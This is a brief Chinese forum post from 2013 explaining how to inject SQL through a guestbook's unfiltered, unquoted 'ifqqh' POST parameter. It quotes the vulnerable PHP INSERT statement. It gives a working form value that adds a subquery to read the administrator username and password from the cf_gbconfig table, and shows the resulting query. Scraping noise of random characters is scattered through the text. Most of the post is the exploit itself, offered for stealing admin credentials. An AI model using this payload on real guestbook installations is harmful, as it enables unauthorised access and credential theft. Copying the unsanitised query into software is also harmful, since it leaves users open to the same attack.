留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。! {# @' C" A, V. S) H- ] F0 D3 J/ ?
9 }) }2 K$ ]# p
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
5 z& E$ A5 E. Z/ p8 W$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响& x6 _( Z. T% F# i1 V
% h: q5 K# \0 T" V+ u
提交的时候把ifqqh的值改一下。变成
2 D4 C( P$ q$ _1 c" Y' N; {( ~0 s8 K) d8 I0 n
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
" H# n7 ]% Y P# b6 D) i: F. Z6 R* x8 S1 I( e# ~5 J
这样SQL插入语句就变了.1 T: r/ K. X( w0 h2 D" b' L
2 ?$ E6 a4 t+ V: k& einsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
2 {( _: Q% g- e4 x- x) \; G3 e2 `2 E2 G' o8 f2 R. E
构造了另外一句SQL。并且把帐号密码读出来。* Y' M1 Q+ c, X3 s
7 Z: a9 I+ P) v$ d% Z |
发表于 2013-2-19 08:10:11
收藏
支持
反对